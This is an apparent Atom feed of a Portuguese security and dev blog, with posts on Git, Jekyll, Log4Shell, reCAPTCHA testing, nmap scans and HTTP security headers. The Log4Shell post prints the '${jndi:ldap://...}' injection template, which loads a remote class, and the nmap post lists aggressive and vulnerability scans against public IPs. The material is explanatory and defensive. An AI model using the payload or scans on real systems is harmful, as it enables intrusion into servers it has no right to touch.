<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="pt_br"><generator uri="https://jekyllrb.com/" version="4.2.1">Jekyll</generator><link href="http://localhost:4000/feed.xml" rel="self" type="application/atom+xml" /><link href="http://localhost:4000/" rel="alternate" type="text/html" hreflang="pt_br" /><updated>2023-01-17T22:16:11+00:00</updated><id>http://localhost:4000/feed.xml</id><title type="html">Callbit.com.br</title><author><name>Caubit</name></author><entry><title type="html">Um pouco sobre comandos do Github!</title><link href="http://localhost:4000/git/" rel="alternate" type="text/html" title="Um pouco sobre comandos do Github!" /><published>2023-01-17T00:00:00+00:00</published><updated>2023-01-17T00:00:00+00:00</updated><id>http://localhost:4000/git</id><content type="html" xml:base="http://localhost:4000/git/">&lt;p&gt;GitHub é uma plataforma de desenvolvimento de software baseada em nuvem que oferece armazenamento de código e ferramentas de colaboração para desenvolvedores. Ele permite que os desenvolvedores armazenem, compartilhem e colaborem em projetos de software usando o sistema de controle de versão Git. Além disso, oferece recursos adicionais, como gerenciamento de tarefas, relatórios de erros e integrações de terceiros.&lt;/p&gt;

&lt;h1 id=&quot;instalando-o-git&quot;&gt;Instalando o Git&lt;/h1&gt;

&lt;p&gt;Instale o Git: você pode baixar o instalador do Git para Windows, Mac ou Linux no site oficial.&lt;/p&gt;

&lt;p&gt;Configure seu nome de usuário e endereço de e-mail: o Git usa essas informações para identificar quem fez as alterações nos commits. Você pode configurá-los usando os seguintes comandos:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git config –global user.name “Seu nome”
$ git config –global user.email “seu@email.com”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Configure seu editor de texto padrão: o Git usa um editor de texto para compor mensagens de commit. Você pode configurar o editor padrão usando o seguinte comando:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git config –global core.editor “nomedoeditor”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Configure o git para usar o ssh: caso você tenha uma chave ssh configurada, você pode usar ela para se autenticar no github, evitando digitar sua senha toda vez que for fazer um push ou pull.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git config –global user.email “seu@email.com”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h1 id=&quot;top-comandos-básicos&quot;&gt;Top Comandos básicos:&lt;/h1&gt;

&lt;p&gt;Esses são os passos básicos para configurar o Git em sua máquina. Existem outras configurações avançadas que você pode fazer, mas essas são as mais importantes para começar a usar o Git.&lt;/p&gt;

&lt;p&gt;Aqui estão alguns dos comandos básicos do Git e como usá-los:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git init&lt;/strong&gt;: inicializa um novo repositório Git em uma pasta específica.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git init&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git clone&lt;/strong&gt;: cria uma cópia local de um repositório remoto.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git clone https://github.com/user/repo.git&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git status&lt;/strong&gt;: mostra o status atual do repositório, incluindo quais arquivos foram modificados e/ou adicionados.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git status&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git add&lt;/strong&gt;: adiciona um arquivo ou uma pasta para o próximo commit.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git add file.txt&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git commit&lt;/strong&gt;: salva as alterações adicionadas em um novo commit.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git commit -m “Commit message”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git log&lt;/strong&gt;: mostra o histórico de commits no repositório.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git log&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git diff&lt;/strong&gt;: mostra as diferenças entre as versões atuais e anteriores de um arquivo.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git diff file.txt&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git branch&lt;/strong&gt;: gerencia ramificações (branches) no repositório.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git branch&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git checkout&lt;/strong&gt;: muda para outra ramificação ou volta para uma versão anterior de um arquivo.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git checkout branch-name&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git push&lt;/strong&gt;: envia as alterações para o repositório remoto.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git push origin branch-name&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;git pull&lt;/strong&gt;: baixa as atualizações do repositório remoto e as aplica ao repositório local.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
  &lt;p&gt;$ git pull origin branch-name&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Esses são alguns dos comandos básicos do Git, que permitem você inicializar, clonar, gerenciar e enviar as alterações para um repositório. No entanto, existem muitos outros comandos e recursos avançados disponíveis no Git.&lt;/p&gt;</content><author><name>caubit</name></author><category term="cybersecurity" /><category term="web" /><summary type="html">GitHub é uma plataforma de desenvolvimento de software baseada em nuvem que oferece armazenamento de código e ferramentas de colaboração para desenvolvedores. Ele permite que os desenvolvedores armazenem, compartilhem e colaborem em projetos de software usando o sistema de controle de versão Git. Além disso, oferece recursos adicionais, como gerenciamento de tarefas, relatórios de erros e integrações de terceiros.</summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://localhost:4000/assets/images/2.jpg" /><media:content medium="image" url="http://localhost:4000/assets/images/2.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Overview sobre Jekyll</title><link href="http://localhost:4000/jekyll/" rel="alternate" type="text/html" title="Overview sobre Jekyll" /><published>2023-01-17T00:00:00+00:00</published><updated>2023-01-17T00:00:00+00:00</updated><id>http://localhost:4000/jekyll</id><content type="html" xml:base="http://localhost:4000/jekyll/">&lt;p&gt;Jekyll é um gerador de sites estáticos que é usado para criar blogs e sites estáticos. Ele é baseado em Ruby e é executado no lado do servidor. Ele permite que você escreva conteúdo em formatos como Markdown ou Textile e, em seguida, o converte em HTML estático.&lt;/p&gt;

&lt;p&gt;Aqui estão alguns passos básicos para usar o Jekyll:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Instale o Ruby e o Jekyll em seu sistema. Isso pode ser feito executando o seguinte comando no terminal:
    &lt;blockquote&gt;
      &lt;p&gt;$ gem install jekyll&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Crie um novo diretório para o seu projeto e entre nele:
    &lt;blockquote&gt;
      &lt;p&gt;$ mkdir meu-novo-projeto 
$ cd meu-novo-projeto&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Inicialize o Jekyll no diretório:
    &lt;blockquote&gt;
      &lt;p&gt;$ jekyll new .&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Inicie o servidor de desenvolvimento:
    &lt;blockquote&gt;
      &lt;p&gt;$ jekyll serve&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Abra o seu navegador e vá para http://localhost:4000 para ver o seu site.&lt;/p&gt;

&lt;p&gt;Para adicionar conteúdo, você pode escrever artigos em Markdown ou Textile e colocá-los na pasta “_posts” do seu projeto.&lt;/p&gt;

&lt;p&gt;Para customizar o layout e o estilo do seu site, você pode editar os arquivos na pasta “_layouts” e “css”&lt;/p&gt;

&lt;p&gt;Para publicar seu site, você pode usar um serviço de hospedagem&lt;/p&gt;</content><author><name>caubit</name></author><category term="dev" /><category term="web" /><summary type="html">Jekyll é um gerador de sites estáticos que é usado para criar blogs e sites estáticos. Ele é baseado em Ruby e é executado no lado do servidor. Ele permite que você escreva conteúdo em formatos como Markdown ou Textile e, em seguida, o converte em HTML estático. Aqui estão alguns passos básicos para usar o Jekyll: Instale o Ruby e o Jekyll em seu sistema. Isso pode ser feito executando o seguinte comando no terminal: $ gem install jekyll Crie um novo diretório para o seu projeto e entre nele: $ mkdir meu-novo-projeto $ cd meu-novo-projeto</summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://localhost:4000/assets/images/2.jpg" /><media:content medium="image" url="http://localhost:4000/assets/images/2.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Log4Shell - 0 Day do Log4j</title><link href="http://localhost:4000/log4j/" rel="alternate" type="text/html" title="Log4Shell - 0 Day do Log4j" /><published>2021-12-13T00:00:00+00:00</published><updated>2021-12-13T00:00:00+00:00</updated><id>http://localhost:4000/log4j</id><content type="html" xml:base="http://localhost:4000/log4j/">&lt;h2 id=&quot;resumo&quot;&gt;Resumo:&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;Esta é uma vulnerabilidade que possibilita a execução remota de código e é simples de explorar;&lt;/li&gt;
  &lt;li&gt;Já existe correção disponível;&lt;/li&gt;
  &lt;li&gt;Muitos WAF podem ter regras habilitadas para possibilitar a mitigação;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;qual-o-impacto&quot;&gt;Qual o impacto?&lt;/h2&gt;

&lt;p&gt;Baseado nas informações dispostas no &lt;a href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228&quot;&gt;CVE-2021-44228&lt;/a&gt;, as versões do Apache Log4j2 &amp;lt;= 2.14.1, possuem features JNDI com falhas de segurança que não protegem contra os ataques direcionados ao LDAP e DSN em consumo endpoint remotos. O que possibilita um invasor executar um código remoto manipulando uma mensagem de log gerada pelo log4j2 .&lt;/p&gt;

&lt;p&gt;O impacto dessa vulnerabilidade é extremamente grande, visto que o Apache Log4j2 é massivamente utilizado por programadores Java para registro em trilhas de auditoria.&lt;/p&gt;

&lt;h2 id=&quot;explicando&quot;&gt;Explicando:&lt;/h2&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/The.log4j.JNDI.Attack.png&quot; alt=&quot;fluxo&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As versões modernas do Log4J2 permitem pesquisas JNDI, que permitem consultas a interface LDAP e DNS para enriquecimento dos Logs, o que pode acabar permitindo o apontamento ( URI ) para uma classe que pode ser carregada de forma indevida.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;log.info(“Usuario logado: {}”, login);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Onde o user nesse caso pode ser um apontamento para uma classe remota que será instanciada no momento do ataque.
Caso o atacante insira o código no campo login o valor&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;${jndi:ldap://&amp;lt;endereco&amp;gt;:&amp;lt;porta&amp;gt;/&amp;lt;uri&amp;gt;}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Quando o valor login é passado como a string acima, o Log4J2 faz uma requisição ao endereço passado e recebe como retorno um objecto ( DN ) que  possui campos que instruem a obtenção da classe remota. Finalmente, o log4j carrega em memória a classe e a executa.&lt;/p&gt;

&lt;p&gt;Se a classe apontada for maliciosa um atacante pode no momento a construção da classe executar comandos no ambiente local do servidor, podendo assim executar, por exemplo, um shell reverso ou instalação de malwares.&lt;/p&gt;

&lt;h2 id=&quot;o-que-pode-ser-feito&quot;&gt;O que pode ser feito?&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;Atualizar a biblioteca Apache Log4J para a versão 2.15;&lt;/li&gt;
  &lt;li&gt;Caso tenha um WAF, atualizar as regras do WAF para bloqueio do payload citado;&lt;/li&gt;
  &lt;li&gt;Desabilitar a funcionalidade de pesquisa para servidores remoto do seu log4j formatMsgNoLookups=true&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;fontes&quot;&gt;Fontes:&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://www.lunasec.io/docs/blog/log4j-zero-day/&quot;&gt;https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j&quot;&gt;https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.elastic.co/pt/blog/detecting-log4j2-with-elastic-security&quot;&gt;https://www.elastic.co/pt/blog/detecting-log4j2-with-elastic-security&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.elastic.co/pt/blog/detecting-log4j2-with-elastic-security&quot;&gt;https://www.elastic.co/pt/blog/detecting-log4j2-with-elastic-security&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;hhttps://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/&quot;&gt;https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/&quot;&gt;https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/&lt;/a&gt;&lt;/p&gt;</content><author><name>caubit</name></author><category term="cybersecurity" /><category term="web" /><summary type="html">Resumo: Esta é uma vulnerabilidade que possibilita a execução remota de código e é simples de explorar; Já existe correção disponível; Muitos WAF podem ter regras habilitadas para possibilitar a mitigação;</summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://localhost:4000/assets/images/8.jpg" /><media:content medium="image" url="http://localhost:4000/assets/images/8.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Recaptcha</title><link href="http://localhost:4000/captcha/" rel="alternate" type="text/html" title="Recaptcha" /><published>2021-10-27T00:00:00+00:00</published><updated>2021-10-27T00:00:00+00:00</updated><id>http://localhost:4000/captcha</id><content type="html" xml:base="http://localhost:4000/captcha/">&lt;p&gt;reCAPTCHA
O reCAPTCHA é um serviço de CAPTCHA sigla, em inglês, para “Completely Automated Public Turing Test to Tell Computers and Humans Apart”, que em tradução simplificada seria “Teste de Turing público e automatizado para separar computadores de humanos”, ou seja um processo para testar se é uma pessoa ou máquina.&lt;/p&gt;

&lt;p&gt;O objetivo principal é conseguir separar trafego para sites e aplicativos, bloqueando que Robôs utilizem seus sites e evitando assim sobrecarga no seu servidor.&lt;/p&gt;

&lt;p&gt;Atualmente o reCAPTCHA possui 2 implementações a V2 ( invisível e checkbox ) e a V3 ( totalmente transparente, utilizando um score ).&lt;/p&gt;

&lt;p&gt;Sendo bem simplista a diferença entre a V2 e a V3 é que esta ultima não apresente desafio algum para o usuário final, havendo apenas bloquei ou não para o usuário final, segundo o google a nova versão garante mais autonomia para os gestores de site.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://youtu.be/tbvxFW4UJdU&quot;&gt;Clique aqui&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Independente da versão utilizada ( V2 ou V3 ) o processo de implementação do reCAPTCHA é feito em 2 blocos, um processo que roda no lado do cliente e um segundo que roda no lado do servidor, vide esquema abaixo:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;../assets/images/sequencerecaptcha.png&quot; alt=&quot;enter image description here&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Um dos erros mais comuns na implementação e não testar o segunda etapa, onde o seu servidor vai até o google e verifica se o token passado é válido. Caso essa etapa não seja feita  a implementação do reCAPTCHA está totalmente ineficaz, comprometendo assim o seu servidor.&lt;/p&gt;

&lt;p&gt;Uma forma muito simple é utilizando uma ferramenta de captura de requisição como o Burp Suite, interceptar a requisição e alterar o valor do campo g-recaptcha-response e verificar se o servidor ira retornar sucesso ou falha na requisição, caso o servidor aceite requisição com o valor do g-recaptcha-response alterado, significa que sua implementação esta insegura e o reCAPTCHA foi implementado de forma insegura e incorreta.&lt;/p&gt;

&lt;p&gt;Outra forma de testar é utilizando o chrome e copiar a requisição feita via curl e reenviar/alterar via linha de comando, como o reCAPTCHA não aceita reutilização token, o reenvio via curl tem que retornar erro no retorno.&lt;/p&gt;

&lt;p&gt;O reCAPTCHA é uma solução muito útil e eficaz para mitigação abuso no consumo do servidor, mas para que isso ocorra a implementação deve ser feita de forma correta, caso contrário será somente uma feature inútil ao seu site.&lt;/p&gt;</content><author><name>caubit</name></author><category term="cybersecurity" /><category term="captcha" /><summary type="html">reCAPTCHA O reCAPTCHA é um serviço de CAPTCHA sigla, em inglês, para “Completely Automated Public Turing Test to Tell Computers and Humans Apart”, que em tradução simplificada seria “Teste de Turing público e automatizado para separar computadores de humanos”, ou seja um processo para testar se é uma pessoa ou máquina.</summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://localhost:4000/assets/images/1.jpg" /><media:content medium="image" url="http://localhost:4000/assets/images/1.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">NMAP básico</title><link href="http://localhost:4000/nmap-basico/" rel="alternate" type="text/html" title="NMAP básico" /><published>2021-10-27T00:00:00+00:00</published><updated>2021-10-27T00:00:00+00:00</updated><id>http://localhost:4000/nmap-basico</id><content type="html" xml:base="http://localhost:4000/nmap-basico/">&lt;p&gt;NMAP (“Network Mapper”) é uma ferramenta free e opensouce para disconery de rede e auditoria de segurança.&lt;/p&gt;

&lt;h2 id=&quot;instalando-nmap&quot;&gt;Instalando NMAP&lt;/h2&gt;
&lt;ol&gt;
  &lt;li&gt;Atualizando pacotes do Linux
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code&gt;sudo apt-get update&lt;/code&gt;&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Install NMAP
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code&gt;sudo apt-get install nmap&lt;/code&gt;&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Verifique a versão
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code&gt;nmap --version&lt;/code&gt;&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id=&quot;básico-contra-um-host&quot;&gt;Básico contra um host&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; &lt;code&gt;1.1.1.1&lt;/code&gt; 
Ou você pode usar um endereço 
nmap &lt;code&gt;callbit.online&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-contra-uma-porta-especifica&quot;&gt;Scan contra uma porta especifica&lt;/h2&gt;
&lt;p&gt;Um range de portas&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; -p &lt;code&gt;1-65535&lt;/code&gt; &lt;code&gt;1.1.1.1&lt;/code&gt;
Uma serie de portas
&lt;em&gt;nmap&lt;/em&gt; -p &lt;code&gt;80,443&lt;/code&gt; &lt;code&gt;1.1.1.1&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-de-múltiplos-ips&quot;&gt;Scan de múltiplos IPs&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; &lt;code&gt;1.1.1.1&lt;/code&gt; &lt;code&gt;2.2.2.2&lt;/code&gt;
Ips consecutivos
&lt;em&gt;nmap&lt;/em&gt; -p &lt;code&gt;1.1.1.1,2,3,4&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-nas-portas-mais-populares&quot;&gt;Scan nas portas mais populares&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; –top-ports &lt;code&gt;20 192.168.1.106&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-em-range-de-ip&quot;&gt;Scan em range de IP&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; -p &lt;code&gt;8.8.8.0/28&lt;/code&gt; ou &lt;em&gt;nmap&lt;/em&gt; &lt;code&gt;8.8.8.1-14&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-agressivo&quot;&gt;Scan agressivo&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; -A &lt;code&gt;8.8.8.0&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-máquinas-ativas&quot;&gt;Scan máquinas ativas&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; -sP &lt;code&gt;8.8.8.0&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-agressivo-1&quot;&gt;Scan agressivo&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; -sL &lt;code&gt;8.8.8.0&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-obter-o-so&quot;&gt;Scan obter o SO&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt; -O &lt;code&gt;8.8.8.0&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2 id=&quot;scan-com-scripts-básicos&quot;&gt;Scan com scripts básicos&lt;/h2&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;nmap&lt;/em&gt;  -Pn –script vuln &lt;code&gt;8.8.8.0&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content><author><name>caubit</name></author><category term="cybersecuroty" /><category term="captcha" /><summary type="html">NMAP (“Network Mapper”) é uma ferramenta free e opensouce para disconery de rede e auditoria de segurança.</summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://localhost:4000/assets/images/7.jpg" /><media:content medium="image" url="http://localhost:4000/assets/images/7.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">HTTP Headers de segurança - 5 Security Headers que você deve configurar no seu Site!</title><link href="http://localhost:4000/Header/" rel="alternate" type="text/html" title="HTTP Headers de segurança - 5 Security Headers que você deve configurar no seu Site!" /><published>2021-10-26T00:00:00+00:00</published><updated>2021-10-26T00:00:00+00:00</updated><id>http://localhost:4000/Header</id><content type="html" xml:base="http://localhost:4000/Header/">&lt;p&gt;HTTP Headers permitem que o browser ( client ) e o servidor se comunicam através de HTTP request ou response e para proteger o cliente ( browser ) contra alguns ataques, foram adicionados a browser modernos alguns mecanismos de proteção para tratar vulnerabilidades.&lt;/p&gt;

&lt;p&gt;Esses Headers são:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;strong&gt;HTTP Strict-Transport-Security (HSTS)&lt;/strong&gt;: força o uso de conexões criptografadas, evitando assim um ataque de Man in the Middle, que pode ocorrer, por exemplo em Wifi Públicos, já que todas as requisições são forçadas a serem em HTTPS.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;strong&gt;Content Security Policy (CSP)&lt;/strong&gt;: Protege contra ataques de injeção de conteúdos como Cross-Site Scripting (XSS), por bloquear requisição entre domínios não autorizados.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;strong&gt;X-Frame-Options&lt;/strong&gt;:  Evita ataques como Clickjacking ( ataque de roubo de cliques ), por dizer se o browser se deve ou não deve carregar conteúdos de endereços especificados,  importante para  tags html como &lt;code&gt;&amp;lt;frame&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;iframe&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;object&amp;gt;&lt;/code&gt; ou &lt;code&gt;&amp;lt;embed&amp;gt;&lt;/code&gt;.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;strong&gt;X-Content-Type-Options&lt;/strong&gt;: Protege contra vulnerabilidades de MIME sniffing, evita que o browser carregue arquivos que foram injetados de forma invalida ou indevida, evitando por exemplo que  seja injetado um arquivo texto com um javascript e ele seja executado do lado do cliente.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;strong&gt;X-XSS-Protection&lt;/strong&gt;: faz com que os navegadores apliquem filtros contra ataques XSS.  XSS são ataques onde uma pessoa poder forçar a execução de códigos indevidos/arbitrários na maquina de outra pessoa.&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Bônus 2 extras:&lt;/p&gt;

&lt;p&gt;Server:&lt;/p&gt;

&lt;p&gt;X-Powered-By:&lt;/p&gt;

&lt;p&gt;Como validar&lt;/p&gt;

&lt;p&gt;Browser&lt;/p&gt;

&lt;p&gt;Valores esperados:&lt;/p&gt;

&lt;p&gt;HTTP Strict-Transport-Security (HSTS):&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Strict-Transport-Security: max-age=&lt;code&gt;expire-time&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;Strict-Transport-Security: max-age=&lt;code&gt;expire-time&lt;/code&gt;; includeSubDomains&lt;/li&gt;
  &lt;li&gt;Strict-Transport-Security: max-age=&lt;code&gt;expire-time&lt;/code&gt;; preload
    &lt;blockquote&gt;
      &lt;p&gt;Note que você deve incluir um número para o expire-time, tempo em segundo.&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Content Security Policy (CSP):&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Content-Security-Policy: policy
    &lt;blockquote&gt;
      &lt;p&gt;&lt;strong&gt;Exemplo&lt;/strong&gt; Content-Security-Policy: default-src ‘self’&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;X-Frame-Options:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;X-Frame-Options: DENY&lt;/li&gt;
  &lt;li&gt;X-Frame-Options: SAMEORIGIN&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;X-Content-Type-Options:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;X-Content-Type-Options: nosniff&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;X-XSS-Protection:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;X-XSS-Protection: 1&lt;/li&gt;
  &lt;li&gt;X-XSS-Protection: 1; mode=block&lt;/li&gt;
  &lt;li&gt;X-XSS-Protection: 1; report=&amp;lt; reporting-uri &amp;gt;
    &lt;blockquote&gt;
      &lt;p&gt;1 habilita a filtragem, se um ataque for detactado ele reporta ao &lt;em&gt;reporting-uri&lt;/em&gt; o ataque&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ul&gt;</content><author><name>caubit</name></author><category term="cybersecurity" /><category term="web" /><summary type="html">HTTP Headers permitem que o browser ( client ) e o servidor se comunicam através de HTTP request ou response e para proteger o cliente ( browser ) contra alguns ataques, foram adicionados a browser modernos alguns mecanismos de proteção para tratar vulnerabilidades.</summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://localhost:4000/assets/images/2.jpg" /><media:content medium="image" url="http://localhost:4000/assets/images/2.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>